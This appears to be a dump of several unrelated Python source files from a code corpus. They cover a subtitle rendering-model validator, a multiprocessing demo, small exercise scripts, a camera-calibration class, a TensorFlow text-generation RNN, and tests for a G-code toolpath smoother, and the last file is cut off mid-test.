#!/usr/bin/env python # -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = "<NAME> <<EMAIL>>" import typing from dataclasses import dataclass from fractions import Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time dur_d: Number = 0 # HRM background drawing time nbg_total: Number = 0 # Number of backgrounds drawn clear: bool = False # Whether the root container had to be cleared dur_t: Number = 0 # HRM text drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number of glyphs copied gren_count: Number = 0 # Total number of glyphs rendered is_empty: bool = False # Does the ISD contain any content class EventHandler: '''Allows a callee to inform the caller of events that occur during processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n" f" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n" f" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose active interval starts at `begin` seconds and ends immediately before the `begin` value of the next ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError("ISDs are not in order of increasing offset") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats) event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator(): # should body elements really be excluded? -> NO # should transparent backgrounds really be counted? -> NO # should span and br really be included -> yes for now # should br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f"Unsupported fontSize units: {font_size.units}") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError("Argument must be a string of length 1") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError("Argument must be a string of length 1") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}") if bg_color.components[3] == 0: return False return True
1.507813
2
month02/multiprocessing/day13-2/myprocess.py
chaofan-zheng/python_learning_code
4
12796570
<reponame>chaofan-zheng/python_learning_code<gh_stars>1-10 """ 自定义进程类 """ from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print("搞点大事情,想干嘛都行") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target): # self._target = target # # def run(self): # self._target() # # def start(self): # # 创建进程  # self.run()
3.96875
4
exe066a.py
Alexmachado81/ExerciciosPython_Resolvidos
0
12796571
soma = cont =0 while True: numero = int(input('Informe um numero inteiro[digite 999 para ele parar ]:')) if numero == 999: break soma = soma + numero cont += 1 print(f' A soma dos {cont} numeros digitador é {soma}')
3.765625
4
examples/resources/football_court/court_image.py
ereide/pyga-camcal
5
12796572
<gh_stars>1-10 import os import numpy as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, "rgb_goal_line_MCity_2.png") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {"back_line": back_line, "goal_top_bar": goal_top_bar, "goal_left_bar" : goal_left_bar, "goal_right_bar": goal_right_bar, "goal_left_back_line": goal_left_back_line, "goal_right_back_line": goal_right_back_line} keeper_box_lines = {"keeper_box_right_line": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines} return self.lines
2.203125
2
0845 Enclosed Islands.py
ansabgillani/binarysearchcomproblems
1
12796573
<filename>0845 Enclosed Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable = 0 seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total - escapable
2.9375
3
tv-script-generation/full_test/neural_network.py
AlphaGit/deep-learning
0
12796574
<filename>tv-script-generation/full_test/neural_network.py import tensorflow as tf import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name="input") p_targets = tf.placeholder(tf.int32, [None, None], name="input") p_learning_rate = tf.placeholder(tf.float32, name="learning_rate") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name="initial_state") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name="final_state") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if key in ['\n', '(', '"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\n ', '\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name("final_state:0") probabilities_tensor = loaded_graph.get_tensor_by_name("probs:0") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print("*********************************************************************************************") print(tv_script) print("*********************************************************************************************")
2.484375
2
vibration_compensation/tests/test_smoothed_toolpath.py
fredizzimo/VibrationCompensation
0
12796575
import os from vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope="module") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, "output") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + ".html")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope="function") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color="red", line_dash="dotted" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color="blue", line_dash="solid" ) p.circle( points[:,0], points[:,1], size=4, fill_color="white" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data self.s = s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = "The spline start distance does not match" if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \ msg def check_start_point_start(self): msg = "The start point of the spline segment does not match the line start point" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = "The start point of the spline segment is not on the line" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = "The start point of the spline segment is not on the middle of the line" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = "The start point of the spline segment is not on the end of the line" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = "The middle point of the spline segment is not on the middle of the line" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = "The middle point of the spline segment is not on the line" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = "The end point of the spline segment does not match the line end point" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = "The end point of the spline segment is not on the line" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\ SegmentChecker.end_error_segment end_error_segment_middle = "The end point of the spline segment is not on the middle of the line" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = "There's a discontinuity at the end of the spline segment" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \ "The previous segment does not end where the current one starts" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\ self.spline.distance(self.spline_start) and \ self.spline.distance(self.spline_start-1e-12) == \ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \ "The previous segment end distance and the current segment start do not match up" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \ "The endpoint of the corner spline is before the line segment end" corner_error = "The closest point of the corner is not close enough" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\ pytest.approx(0.01, abs=1e-12), \ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, False) if start == "start": checker.check_start_point_start() elif start == "on": checker.check_start_point_on() elif start == "middle": checker.check_line_start_point_middle() elif start == "end": checker.check_line_start_point_end() else: assert False, "Invalid start type" if start == "start" and end == "end": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == "end": checker.check_end_point_end() elif end == "on": checker.check_end_point_on() elif end == "middle": checker.check_end_point_middle() else: assert False, "Invalid end type" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == "on": checker.check_start_point_on() elif start == "middle": checker.check_line_start_point_middle() else: assert False, "Invalid start type" if start == "middle" or end == "middle": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == "on": checker.check_corner_end_point_on() elif end == "middle": checker.check_corner_end_point_middle() else: assert False, "Invalid end type" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ "G1 X100 Y200" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start="start", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ "G1 X50 Y50", "G1 X100 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start="start", end="end") straight_segment(data, l=1, s=1, start="start", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X100 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X0 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X0 Y1" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X200 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ "G1 X-100 Y-100", "G1 X-200 Y-100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X200 Y1" ], maximum_error=0.01) 